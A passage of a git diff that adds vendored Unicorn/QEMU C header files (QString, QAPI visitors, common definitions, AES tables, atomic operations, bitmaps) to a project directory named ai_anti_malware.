+static inline qtype_code qobject_type(const QObject *obj)
+{
+    assert(obj->type != NULL);
+    return obj->type->code;
+}
+
+#endif /* QOBJECT_H */
diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp/qstring.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp/qstring.h
new file mode 100644
index 0000000..734e912
--- /dev/null
+++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp/qstring.h
@@ -0,0 +1,36 @@
+/*
+ * QString Module
+ *
+ * Copyright (C) 2009 Red Hat Inc.
+ *
+ * Authors:
+ *  Luiz Capitulino <lcapitulino@redhat.com>
+ *
+ * This work is licensed under the terms of the GNU LGPL, version 2.1 or later.
+ * See the COPYING.LIB file in the top-level directory. 
+ */ + +#ifndef QSTRING_H +#define QSTRING_H + +#include "unicorn/platform.h" +#include "qapi/qmp/qobject.h" + +typedef struct QString { + QObject_HEAD; + char *string; + size_t length; + size_t capacity; +} QString; + +QString *qstring_new(void); +QString *qstring_from_str(const char *str); +QString *qstring_from_substr(const char *str, int start, int end); +size_t qstring_get_length(const QString *qstring); +const char *qstring_get_str(const QString *qstring); +void qstring_append_int(QString *qstring, int64_t value); +void qstring_append(QString *qstring, const char *str); +void qstring_append_chr(QString *qstring, int c); +QString *qobject_to_qstring(const QObject *obj); + +#endif /* QSTRING_H */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp/types.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp/types.h new file mode 100644 index 0000000..7782ec5 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/qmp/types.h @@ -0,0 +1,25 @@ +/* + * Include all QEMU objects. + * + * Copyright (C) 2009 Red Hat Inc. + * + * Authors: + * Luiz Capitulino <lcapitulino@redhat.com> + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. 
+ */ + +#ifndef QEMU_OBJECTS_H +#define QEMU_OBJECTS_H + +#include "qapi/qmp/qobject.h" +#include "qapi/qmp/qint.h" +#include "qapi/qmp/qfloat.h" +#include "qapi/qmp/qbool.h" +#include "qapi/qmp/qstring.h" +#include "qapi/qmp/qdict.h" +#include "qapi/qmp/qlist.h" +#include "qapi/qmp/qjson.h" + +#endif /* QEMU_OBJECTS_H */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/string-input-visitor.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/string-input-visitor.h new file mode 100644 index 0000000..089243c --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/string-input-visitor.h @@ -0,0 +1,25 @@ +/* + * String parsing Visitor + * + * Copyright Red Hat, Inc. 2012 + * + * Author: Paolo Bonzini <pbonzini@redhat.com> + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. + * + */ + +#ifndef STRING_INPUT_VISITOR_H +#define STRING_INPUT_VISITOR_H + +#include "qapi/visitor.h" + +typedef struct StringInputVisitor StringInputVisitor; + +StringInputVisitor *string_input_visitor_new(const char *str); +void string_input_visitor_cleanup(StringInputVisitor *v); + +Visitor *string_input_get_visitor(StringInputVisitor *v); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/visitor-impl.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/visitor-impl.h new file mode 100644 index 0000000..09bb0fd --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/visitor-impl.h @@ -0,0 +1,67 @@ +/* + * Core Definitions for QAPI Visitor implementations + * + * Copyright (C) 2012 Red Hat, Inc. + * + * Author: Paolo Bonizni <pbonzini@redhat.com> + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. 
+ * + */ +#ifndef QAPI_VISITOR_IMPL_H +#define QAPI_VISITOR_IMPL_H + +#include "qapi/error.h" +#include "qapi/visitor.h" + +struct Visitor +{ + /* Must be set */ + void (*start_struct)(Visitor *v, void **obj, const char *kind, + const char *name, size_t size, Error **errp); + void (*end_struct)(Visitor *v, Error **errp); + + void (*start_implicit_struct)(Visitor *v, void **obj, size_t size, + Error **errp); + void (*end_implicit_struct)(Visitor *v, Error **errp); + + void (*start_list)(Visitor *v, const char *name, Error **errp); + GenericList *(*next_list)(Visitor *v, GenericList **list, Error **errp); + void (*end_list)(Visitor *v, Error **errp); + + void (*type_enum)(Visitor *v, int *obj, const char *strings[], + const char *kind, const char *name, Error **errp); + void (*get_next_type)(Visitor *v, int *kind, const int *qobjects, + const char *name, Error **errp); + + void (*type_int)(Visitor *v, int64_t *obj, const char *name, Error **errp); + void (*type_bool)(Visitor *v, bool *obj, const char *name, Error **errp); + void (*type_str)(Visitor *v, char **obj, const char *name, Error **errp); + void (*type_number)(Visitor *v, double *obj, const char *name, + Error **errp); + + /* May be NULL */ + void (*optional)(Visitor *v, bool *present, const char *name, + Error **errp); + + void (*type_uint8)(Visitor *v, uint8_t *obj, const char *name, Error **errp); + void (*type_uint16)(Visitor *v, uint16_t *obj, const char *name, Error **errp); + void (*type_uint32)(Visitor *v, uint32_t *obj, const char *name, Error **errp); + void (*type_uint64)(Visitor *v, uint64_t *obj, const char *name, Error **errp); + void (*type_int8)(Visitor *v, int8_t *obj, const char *name, Error **errp); + void (*type_int16)(Visitor *v, int16_t *obj, const char *name, Error **errp); + void (*type_int32)(Visitor *v, int32_t *obj, const char *name, Error **errp); + void (*type_int64)(Visitor *v, int64_t *obj, const char *name, Error **errp); + /* visit_type_size() falls back to (*type_uint64)() if 
type_size is unset */ + void (*type_size)(Visitor *v, uint64_t *obj, const char *name, Error **errp); + bool (*start_union)(Visitor *v, bool data_present, Error **errp); + void (*end_union)(Visitor *v, bool data_present, Error **errp); +}; + +void input_type_enum(Visitor *v, int *obj, const char *strings[], + const char *kind, const char *name, Error **errp); +void output_type_enum(Visitor *v, int *obj, const char *strings[], + const char *kind, const char *name, Error **errp); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/visitor.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/visitor.h new file mode 100644 index 0000000..5934f59 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qapi/visitor.h @@ -0,0 +1,64 @@ +/* + * Core Definitions for QAPI Visitor Classes + * + * Copyright IBM, Corp. 2011 + * + * Authors: + * Anthony Liguori <aliguori@us.ibm.com> + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. 
+ * + */ +#ifndef QAPI_VISITOR_CORE_H +#define QAPI_VISITOR_CORE_H + +#include "qemu/typedefs.h" +#include "qapi/qmp/qobject.h" +#include "qapi/error.h" +#include <stdlib.h> + +typedef struct GenericList +{ + union { + void *value; + uint64_t padding; + }; + struct GenericList *next; +} GenericList; + +void visit_start_handle(Visitor *v, void **obj, const char *kind, + const char *name, Error **errp); +void visit_end_handle(Visitor *v, Error **errp); +void visit_start_struct(Visitor *v, void **obj, const char *kind, + const char *name, size_t size, Error **errp); +void visit_end_struct(Visitor *v, Error **errp); +void visit_start_implicit_struct(Visitor *v, void **obj, size_t size, + Error **errp); +void visit_end_implicit_struct(Visitor *v, Error **errp); +void visit_start_list(Visitor *v, const char *name, Error **errp); +GenericList *visit_next_list(Visitor *v, GenericList **list, Error **errp); +void visit_end_list(Visitor *v, Error **errp); +void visit_optional(Visitor *v, bool *present, const char *name, + Error **errp); +void visit_get_next_type(Visitor *v, int *obj, const int *qtypes, + const char *name, Error **errp); +void visit_type_enum(Visitor *v, int *obj, const char *strings[], + const char *kind, const char *name, Error **errp); +void visit_type_int(Visitor *v, int64_t *obj, const char *name, Error **errp); +void visit_type_uint8(Visitor *v, uint8_t *obj, const char *name, Error **errp); +void visit_type_uint16(Visitor *v, uint16_t *obj, const char *name, Error **errp); +void visit_type_uint32(Visitor *v, uint32_t *obj, const char *name, Error **errp); +void visit_type_uint64(Visitor *v, uint64_t *obj, const char *name, Error **errp); +void visit_type_int8(Visitor *v, int8_t *obj, const char *name, Error **errp); +void visit_type_int16(Visitor *v, int16_t *obj, const char *name, Error **errp); +void visit_type_int32(Visitor *v, int32_t *obj, const char *name, Error **errp); +void visit_type_int64(Visitor *v, int64_t *obj, const char *name, Error 
**errp); +void visit_type_size(Visitor *v, uint64_t *obj, const char *name, Error **errp); +void visit_type_bool(Visitor *v, bool *obj, const char *name, Error **errp); +void visit_type_str(Visitor *v, char **obj, const char *name, Error **errp); +void visit_type_number(Visitor *v, double *obj, const char *name, Error **errp); +bool visit_start_union(Visitor *v, bool data_present, Error **errp); +void visit_end_union(Visitor *v, bool data_present, Error **errp); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu-common.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu-common.h new file mode 100644 index 0000000..d2097db --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu-common.h @@ -0,0 +1,252 @@ + +/* Common header file that is included by all of QEMU. + * + * This file is supposed to be included only by .c files. No header file should + * depend on qemu-common.h, as this would easily lead to circular header + * dependencies. + * + * If a header file uses a definition from qemu-common.h, that definition + * must be moved to a separate header file, and the header that uses it + * must include that header. 
+ */ +#ifndef QEMU_COMMON_H +#define QEMU_COMMON_H + +#include "qemu/compiler.h" +#include "config-host.h" +#include "qemu/typedefs.h" +#include "exec/cpu-common.h" + +#if defined(__arm__) || defined(__sparc__) || defined(__mips__) || defined(__hppa__) || defined(__ia64__) +#define WORDS_ALIGNED +#endif + +#define TFR(expr) do { if ((expr) != -1) break; } while (errno == EINTR) + +/* we put basic includes here to avoid repeating them in device drivers */ +#include <stdlib.h> +#include <stdio.h> +#include <stdarg.h> +#include "unicorn/platform.h" +#include <string.h> +#include <limits.h> +#include <time.h> +#include <ctype.h> +#include <errno.h> +#include <fcntl.h> +#include <sys/stat.h> +#include <assert.h> +#include "glib_compat.h" + +#ifdef _WIN32 +#include "sysemu/os-win32.h" +#endif + +#ifndef O_LARGEFILE +#define O_LARGEFILE 0 +#endif +#ifndef O_BINARY +#define O_BINARY 0 +#endif +#ifndef MAP_ANONYMOUS +#define MAP_ANONYMOUS MAP_ANON +#endif +#ifndef ENOMEDIUM +#define ENOMEDIUM ENODEV +#endif +#if !defined(ENOTSUP) +#define ENOTSUP 4096 +#endif +#if !defined(ECANCELED) +#define ECANCELED 4097 +#endif +#if !defined(EMEDIUMTYPE) +#define EMEDIUMTYPE 4098 +#endif +#ifndef TIME_MAX +#define TIME_MAX LONG_MAX +#endif + +/* HOST_LONG_BITS is the size of a native pointer in bits. */ +#if UINTPTR_MAX == UINT32_MAX +# define HOST_LONG_BITS 32 +#elif UINTPTR_MAX == UINT64_MAX +# define HOST_LONG_BITS 64 +#else +# error Unknown pointer size +#endif + +typedef int (*fprintf_function)(FILE *f, const char *fmt, ...) + GCC_FMT_ATTR(2, 3); + +#ifdef _WIN32 +#define fsync _commit +#if !defined(lseek) +# define lseek _lseeki64 +#endif +int qemu_ftruncate64(int, int64_t); +#if !defined(ftruncate) +# define ftruncate qemu_ftruncate64 +#endif +#endif + +#include "qemu/osdep.h" +#include "qemu/bswap.h" + +/* FIXME: Remove NEED_CPU_H. 
*/ +#ifdef NEED_CPU_H +#include "cpu.h" +#endif /* !defined(NEED_CPU_H) */ + +/* cutils.c */ +void pstrcpy(char *buf, int buf_size, const char *str); +char *pstrcat(char *buf, int buf_size, const char *s); +int strstart(const char *str, const char *val, const char **ptr); +int qemu_fls(int i); + +/* + * strtosz() suffixes used to specify the default treatment of an + * argument passed to strtosz() without an explicit suffix. + * These should be defined using upper case characters in the range + * A-Z, as strtosz() will use qemu_toupper() on the given argument + * prior to comparison. + */ +#define STRTOSZ_DEFSUFFIX_EB 'E' +#define STRTOSZ_DEFSUFFIX_PB 'P' +#define STRTOSZ_DEFSUFFIX_TB 'T' +#define STRTOSZ_DEFSUFFIX_GB 'G' +#define STRTOSZ_DEFSUFFIX_MB 'M' +#define STRTOSZ_DEFSUFFIX_KB 'K' +#define STRTOSZ_DEFSUFFIX_B 'B' +int64_t strtosz(const char *nptr, char **end); +int64_t strtosz_suffix(const char *nptr, char **end, const char default_suffix); +int64_t strtosz_suffix_unit(const char *nptr, char **end, + const char default_suffix, int64_t unit); + +/* used to print char* safely */ +#define STR_OR_NULL(str) ((str) ? 
(str) : "null") + +#define qemu_isalnum(c) isalnum((unsigned char)(c)) +#define qemu_isalpha(c) isalpha((unsigned char)(c)) +#define qemu_iscntrl(c) iscntrl((unsigned char)(c)) +#define qemu_isdigit(c) isdigit((unsigned char)(c)) +#define qemu_isgraph(c) isgraph((unsigned char)(c)) +#define qemu_islower(c) islower((unsigned char)(c)) +#define qemu_isprint(c) isprint((unsigned char)(c)) +#define qemu_ispunct(c) ispunct((unsigned char)(c)) +#define qemu_isspace(c) isspace((unsigned char)(c)) +#define qemu_isupper(c) isupper((unsigned char)(c)) +#define qemu_isxdigit(c) isxdigit((unsigned char)(c)) +#define qemu_tolower(c) tolower((unsigned char)(c)) +#define qemu_toupper(c) toupper((unsigned char)(c)) +#define qemu_isascii(c) isascii((unsigned char)(c)) +#define qemu_toascii(c) toascii((unsigned char)(c)) + +void *qemu_oom_check(void *ptr); + +#ifdef _WIN32 +/* MinGW needs type casts for the 'buf' and 'optval' arguments. */ +#define qemu_getsockopt(sockfd, level, optname, optval, optlen) \ + getsockopt(sockfd, level, optname, (void *)optval, optlen) +#define qemu_setsockopt(sockfd, level, optname, optval, optlen) \ + setsockopt(sockfd, level, optname, (const void *)optval, optlen) +#define qemu_recv(sockfd, buf, len, flags) recv(sockfd, (void *)buf, len, flags) +#define qemu_sendto(sockfd, buf, len, flags, destaddr, addrlen) \ + sendto(sockfd, (const void *)buf, len, flags, destaddr, addrlen) +#else +#define qemu_getsockopt(sockfd, level, optname, optval, optlen) \ + getsockopt(sockfd, level, optname, optval, optlen) +#define qemu_setsockopt(sockfd, level, optname, optval, optlen) \ + setsockopt(sockfd, level, optname, optval, optlen) +#define qemu_recv(sockfd, buf, len, flags) recv(sockfd, buf, len, flags) +#define qemu_sendto(sockfd, buf, len, flags, destaddr, addrlen) \ + sendto(sockfd, buf, len, flags, destaddr, addrlen) +#endif + +/* Error handling. 
*/ + +void tcg_exec_init(struct uc_struct *uc, unsigned long tb_size); +bool tcg_enabled(struct uc_struct *uc); + +struct uc_struct; +void cpu_exec_init_all(struct uc_struct *uc); + +/* compute with 96 bit intermediate result: (a*b)/c */ +static inline uint64_t muldiv64(uint64_t a, uint32_t b, uint32_t c) +{ + union { + uint64_t ll; + struct { +#ifdef HOST_WORDS_BIGENDIAN + uint32_t high, low; +#else + uint32_t low, high; +#endif + } l; + } u, res; + uint64_t rl, rh; + + u.ll = a; + rl = (uint64_t)u.l.low * (uint64_t)b; + rh = (uint64_t)u.l.high * (uint64_t)b; + rh += (rl >> 32); + res.l.high = (uint32_t)(rh / c); + res.l.low = (((rh % c) << 32) + (rl & 0xffffffff)) / c; + return res.ll; +} + +/* Round number down to multiple */ +#define QEMU_ALIGN_DOWN(n, m) ((n) / (m) * (m)) + +/* Round number up to multiple */ +#define QEMU_ALIGN_UP(n, m) QEMU_ALIGN_DOWN((n) + (m) - 1, (m)) + +#include "qemu/module.h" + +/* vector definitions */ +#ifdef __ALTIVEC__ +/* The altivec.h header says we're allowed to undef these for + * C++ compatibility. Here we don't care about C++, but we + * undef them anyway to avoid namespace pollution. + */ +#undef vector +#undef pixel +#undef bool +#include <altivec.h> +#define VECTYPE __vector unsigned char +#define SPLAT(p) vec_splat(vec_ld(0, p), 0) +#define ALL_EQ(v1, v2) vec_all_eq(v1, v2) +/* altivec.h may redefine the bool macro as vector type. + * Reset it to POSIX semantics. */ +#define bool _Bool +#elif defined __SSE2__ +#include <emmintrin.h> +#define VECTYPE __m128i +#define SPLAT(p) _mm_set1_epi8(*(p)) +#define ALL_EQ(v1, v2) (_mm_movemask_epi8(_mm_cmpeq_epi8(v1, v2)) == 0xFFFF) +#else +#define VECTYPE unsigned long +#define SPLAT(p) (*(p) * (~0UL / 255)) +#define ALL_EQ(v1, v2) ((v1) == (v2)) +#endif + +// support for calling functions before main code is executed. 
+#if defined(_MSC_VER) + #pragma section(".CRT$XCU",read) + #define INITIALIZER2_(f,p) \ + static void f(void); \ + __declspec(allocate(".CRT$XCU")) void (*f##_)(void) = f; \ + __pragma(comment(linker,"/include:" p #f "_")) \ + static void f(void) + #ifdef _WIN64 + #define INITIALIZER(f) INITIALIZER2_(f,"") + #else + #define INITIALIZER(f) INITIALIZER2_(f,"_") + #endif +#else + #define INITIALIZER(f) \ + static void f(void) __attribute__((constructor)); \ + static void f(void) +#endif + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/aes.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/aes.h new file mode 100644 index 0000000..63438ad --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/aes.h @@ -0,0 +1,68 @@ +#ifndef QEMU_AES_H +#define QEMU_AES_H + +#define AES_MAXNR 14 +#define AES_BLOCK_SIZE 16 + +struct aes_key_st { + uint32_t rd_key[4 *(AES_MAXNR + 1)]; + int rounds; +}; +typedef struct aes_key_st AES_KEY; + +/* FreeBSD has its own AES_set_decrypt_key in -lcrypto, avoid conflicts */ +#ifdef __FreeBSD__ +#define AES_set_encrypt_key QEMU_AES_set_encrypt_key +#define AES_set_decrypt_key QEMU_AES_set_decrypt_key +#define AES_encrypt QEMU_AES_encrypt +#define AES_decrypt QEMU_AES_decrypt +#define AES_cbc_encrypt QEMU_AES_cbc_encrypt +#endif + +int AES_set_encrypt_key(const unsigned char *userKey, const int bits, + AES_KEY *key); +int AES_set_decrypt_key(const unsigned char *userKey, const int bits, + AES_KEY *key); + +void AES_encrypt(const unsigned char *in, unsigned char *out, + const AES_KEY *key); +void AES_decrypt(const unsigned char *in, unsigned char *out, + const AES_KEY *key); +void AES_cbc_encrypt(const unsigned char *in, unsigned char *out, + const unsigned long length, const AES_KEY *key, + unsigned char *ivec, const int enc); + +extern const uint8_t AES_sbox[256]; +extern const uint8_t AES_isbox[256]; + +/* AES ShiftRows and InvShiftRows */ +extern const uint8_t AES_shifts[16]; +extern 
const uint8_t AES_ishifts[16]; + +/* AES InvMixColumns */ +/* AES_imc[x][0] = [x].[0e, 09, 0d, 0b]; */ +/* AES_imc[x][1] = [x].[0b, 0e, 09, 0d]; */ +/* AES_imc[x][2] = [x].[0d, 0b, 0e, 09]; */ +/* AES_imc[x][3] = [x].[09, 0d, 0b, 0e]; */ +extern const uint32_t AES_imc[256][4]; + +/* +AES_Te0[x] = S [x].[02, 01, 01, 03]; +AES_Te1[x] = S [x].[03, 02, 01, 01]; +AES_Te2[x] = S [x].[01, 03, 02, 01]; +AES_Te3[x] = S [x].[01, 01, 03, 02]; +AES_Te4[x] = S [x].[01, 01, 01, 01]; + +AES_Td0[x] = Si[x].[0e, 09, 0d, 0b]; +AES_Td1[x] = Si[x].[0b, 0e, 09, 0d]; +AES_Td2[x] = Si[x].[0d, 0b, 0e, 09]; +AES_Td3[x] = Si[x].[09, 0d, 0b, 0e]; +AES_Td4[x] = Si[x].[01, 01, 01, 01]; +*/ + +extern const uint32_t AES_Te0[256], AES_Te1[256], AES_Te2[256], + AES_Te3[256], AES_Te4[256]; +extern const uint32_t AES_Td0[256], AES_Td1[256], AES_Td2[256], + AES_Td3[256], AES_Td4[256]; + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/atomic.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/atomic.h new file mode 100644 index 0000000..79c10ef --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/atomic.h @@ -0,0 +1,234 @@ +/* + * Simple interface for atomic operations. + * + * Copyright (C) 2013 Red Hat, Inc. + * + * Author: Paolo Bonzini <pbonzini@redhat.com> + * + * This work is licensed under the terms of the GNU GPL, version 2 or later. + * See the COPYING file in the top-level directory. + * + */ + +#ifndef __QEMU_ATOMIC_H +#define __QEMU_ATOMIC_H 1 + +#include "qemu/compiler.h" + +/* For C11 atomic ops */ + +/* Compiler barrier */ +#ifdef _MSC_VER +void _ReadWriteBarrier(void); +#pragma intrinsic(_ReadWriteBarrier) +#define barrier() do { _ReadWriteBarrier(); } while (0) +#else +#define barrier() ({ asm volatile("" ::: "memory"); (void)0; }) +#endif + +#ifndef __ATOMIC_RELAXED + +/* + * We use GCC builtin if it's available, as that can use mfence on + * 32-bit as well, e.g. if built with -march=pentium-m. 
However, on + * i386 the spec is buggy, and the implementation followed it until + * 4.3 (http://gcc.gnu.org/bugzilla/show_bug.cgi?id=36793). + */ +#if defined(__i386__) || defined(__x86_64__) +#if !QEMU_GNUC_PREREQ(4, 4) +#if defined __x86_64__ +# ifdef _MSC_VER +// TODO: fix me!!! +# define smp_mb() //{ __asm volatile("mfence" ::: "memory"); (void)0; } +# else +# define smp_mb() ({ asm volatile("mfence" ::: "memory"); (void)0; }) +# endif +#else +# ifdef _MSC_VER +// TODO: fix me!!! +# define smp_mb() //{ __asm volatile("lock; addl $0,0(%esp) " ::: "memory"); (void)0; } +# else +# define smp_mb() ({ asm volatile("lock; addl $0,0(%%esp) " ::: "memory"); (void)0; }) +# endif +#endif +#endif +#endif + + +#ifdef __alpha__ +#define smp_read_barrier_depends() asm volatile("mb":::"memory") +#endif + +#if defined(__i386__) || defined(__x86_64__) || defined(__s390x__) + +/* + * Because of the strongly ordered storage model, wmb() and rmb() are nops + * here (a compiler barrier only). QEMU doesn't do accesses to write-combining + * qemu memory or non-temporal load/stores from C code. + */ +#define smp_wmb() barrier() +#define smp_rmb() barrier() + +/* + * __sync_lock_test_and_set() is documented to be an acquire barrier only, + * but it is a full barrier at the hardware level. Add a compiler barrier + * to make it a full barrier also at the compiler level. + */ +#define atomic_xchg(ptr, i) (barrier(), __sync_lock_test_and_set(ptr, i)) + +/* + * Load/store with Java volatile semantics. + */ +#define atomic_mb_set(ptr, i) ((void)atomic_xchg(ptr, i)) + +#elif defined(_ARCH_PPC) + +/* + * We use an eieio() for wmb() on powerpc. This assumes we don't + * need to order cacheable and non-cacheable stores with respect to + * each other. + * + * smp_mb has the same problem as on x86 for not-very-new GCC + * (http://patchwork.ozlabs.org/patch/126184/, Nov 2011). 
+ */ +#define smp_wmb() ({ asm volatile("eieio" ::: "memory"); (void)0; }) +#if defined(__powerpc64__) +#define smp_rmb() ({ asm volatile("lwsync" ::: "memory"); (void)0; }) +#else +#define smp_rmb() ({ asm volatile("sync" ::: "memory"); (void)0; }) +#endif +#define smp_mb() ({ asm volatile("sync" ::: "memory"); (void)0; }) + +#endif /* _ARCH_PPC */ + +#endif /* C11 atomics */ + +/* + * For (host) platforms we don't have explicit barrier definitions + * for, we use the gcc __sync_synchronize() primitive to generate a + * full barrier. This should be safe on all platforms, though it may + * be overkill for smp_wmb() and smp_rmb(). + */ +#ifndef smp_mb +#define smp_mb() __sync_synchronize() +#endif + +#ifndef smp_wmb +#ifdef __ATOMIC_RELEASE +#define smp_wmb() __atomic_thread_fence(__ATOMIC_RELEASE) +#else +#define smp_wmb() __sync_synchronize() +#endif +#endif + +#ifndef smp_rmb +#ifdef __ATOMIC_ACQUIRE +#define smp_rmb() __atomic_thread_fence(__ATOMIC_ACQUIRE) +#else +#define smp_rmb() __sync_synchronize() +#endif +#endif + +#ifndef smp_read_barrier_depends +#ifdef __ATOMIC_CONSUME +#define smp_read_barrier_depends() __atomic_thread_fence(__ATOMIC_CONSUME) +#else +#define smp_read_barrier_depends() barrier() +#endif +#endif + +#ifndef atomic_read +#define atomic_read(ptr) (*(__typeof__(*ptr) *volatile) (ptr)) +#endif + +#ifndef atomic_set +#define atomic_set(ptr, i) ((*(__typeof__(*ptr) *volatile) (ptr)) = (i)) +#endif + +/* These have the same semantics as Java volatile variables. + * See http://gee.cs.oswego.edu/dl/jmm/cookbook.html: + * "1. Issue a StoreStore barrier (wmb) before each volatile store." + * 2. Issue a StoreLoad barrier after each volatile store. + * Note that you could instead issue one before each volatile load, but + * this would be slower for typical programs using volatiles in which + * reads greatly outnumber writes. 
Alternatively, if available, you + * can implement volatile store as an atomic instruction (for example + * XCHG on x86) and omit the barrier. This may be more efficient if + * atomic instructions are cheaper than StoreLoad barriers. + * 3. Issue LoadLoad and LoadStore barriers after each volatile load." + * + * If you prefer to think in terms of "pairing" of memory barriers, + * an atomic_mb_read pairs with an atomic_mb_set. + * + * And for the few ia64 lovers that exist, an atomic_mb_read is a ld.acq, + * while an atomic_mb_set is a st.rel followed by a memory barrier. + * + * These are a bit weaker than __atomic_load/store with __ATOMIC_SEQ_CST + * (see docs/atomics.txt), and I'm not sure that __ATOMIC_ACQ_REL is enough. + * Just always use the barriers manually by the rules above. + */ +#ifndef atomic_mb_read +#define atomic_mb_read(ptr) ({ \ + typeof(*ptr) _val = atomic_read(ptr); \ + smp_rmb(); \ + _val; \ +}) +#endif + +#ifndef atomic_mb_set +#define atomic_mb_set(ptr, i) do { \ + smp_wmb(); \ + atomic_set(ptr, i); \ + smp_mb(); \ +} while (0) +#endif + +#ifndef atomic_xchg +#if defined(__clang__) +#define atomic_xchg(ptr, i) __sync_swap(ptr, i) +#elif defined(__ATOMIC_SEQ_CST) +#define atomic_xchg(ptr, i) ({ \ + typeof(*ptr) _new = (i), _old; \ + __atomic_exchange(ptr, &_new, &_old, __ATOMIC_SEQ_CST); \ + _old; \ +}) +#else +/* __sync_lock_test_and_set() is documented to be an acquire barrier only. */ +#define atomic_xchg(ptr, i) (smp_mb(), __sync_lock_test_and_set(ptr, i)) +#endif +#endif + +/* Provide shorter names for GCC atomic builtins. 
*/
+#ifdef _MSC_VER
+// these return the new value (so we make it return the previous value);
+// (n) is parenthesized so compound arguments negate/add as a whole
+#define atomic_fetch_inc(ptr)  ((InterlockedIncrement(ptr))-1)
+#define atomic_fetch_dec(ptr)  ((InterlockedDecrement(ptr))+1)
+#define atomic_fetch_add(ptr, n) ((InterlockedAdd(ptr, (n)))-(n))
+#define atomic_fetch_sub(ptr, n) ((InterlockedAdd(ptr, -(n)))+(n))
+#else
+// these return the previous value
+#define atomic_fetch_inc(ptr)  __sync_fetch_and_add(ptr, 1)
+#define atomic_fetch_dec(ptr)  __sync_fetch_and_add(ptr, -1)
+#define atomic_fetch_add       __sync_fetch_and_add
+#define atomic_fetch_sub       __sync_fetch_and_sub
+#define atomic_fetch_and       __sync_fetch_and_and
+#define atomic_fetch_or        __sync_fetch_and_or
+#define atomic_cmpxchg         __sync_val_compare_and_swap
+#endif
+
+/* And even shorter names that return void.  */
+#ifdef _MSC_VER
+#define atomic_inc(ptr)        ((void) InterlockedIncrement(ptr))
+#define atomic_dec(ptr)        ((void) InterlockedDecrement(ptr))
+#define atomic_add(ptr, n)     ((void) InterlockedAdd(ptr, (n)))
+#define atomic_sub(ptr, n)     ((void) InterlockedAdd(ptr, -(n)))
+#else
+#define atomic_inc(ptr)        ((void) __sync_fetch_and_add(ptr, 1))
+#define atomic_dec(ptr)        ((void) __sync_fetch_and_add(ptr, -1))
+#define atomic_add(ptr, n)     ((void) __sync_fetch_and_add(ptr, n))
+#define atomic_sub(ptr, n)     ((void) __sync_fetch_and_sub(ptr, n))
+#define atomic_and(ptr, n)     ((void) __sync_fetch_and_and(ptr, n))
+#define atomic_or(ptr, n)      ((void) __sync_fetch_and_or(ptr, n))
+#endif
+
+#endif
diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/bitmap.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/bitmap.h
new file mode 100644
index 0000000..b8faee8
--- /dev/null
+++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/bitmap.h
@@ -0,0 +1,61 @@
+/*
+ * Bitmap Module
+ *
+ * Copyright (C) 2010 Corentin Chary <corentin.chary@gmail.com>
+ *
+ * Mostly inspired by (stolen from) linux/bitmap.h and linux/bitops.h
+ *
+ * This work is licensed under the terms of the GNU 
LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. + */ + +#ifndef BITMAP_H +#define BITMAP_H + +#include "glib_compat.h" +#include <string.h> +#include <stdlib.h> + +#include "qemu/osdep.h" +#include "qemu/bitops.h" + +/* + * The available bitmap operations and their rough meaning in the + * case that the bitmap is a single unsigned long are thus: + * + * Note that nbits should be always a compile time evaluable constant. + * Otherwise many inlines will generate horrible code. + * + * qemu_bitmap_set(dst, pos, nbits) Set specified bit area + * qemu_bitmap_clear(dst, pos, nbits) Clear specified bit area + */ + +/* + * Also the following operations apply to bitmaps. + * + * set_bit(bit, addr) *addr |= bit + * clear_bit(bit, addr) *addr &= ~bit + */ + +#define BITMAP_LAST_WORD_MASK(nbits) \ + ( \ + ((nbits) % BITS_PER_LONG) ? \ + (1UL<<((nbits) % BITS_PER_LONG))-1 : ~0UL \ + ) + +#define DECLARE_BITMAP(name,bits) \ + unsigned long name[BITS_TO_LONGS(bits)] + +void qemu_bitmap_set(unsigned long *map, long i, long len); +void qemu_bitmap_clear(unsigned long *map, long start, long nr); + +static inline unsigned long *bitmap_zero_extend(unsigned long *old, + long old_nbits, long new_nbits) +{ + long new_len = BITS_TO_LONGS(new_nbits) * sizeof(unsigned long); + unsigned long *new = g_realloc(old, new_len); + qemu_bitmap_clear(new, old_nbits, new_nbits - old_nbits); + return new; +} + +#endif /* BITMAP_H */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/qemu/bitops.h 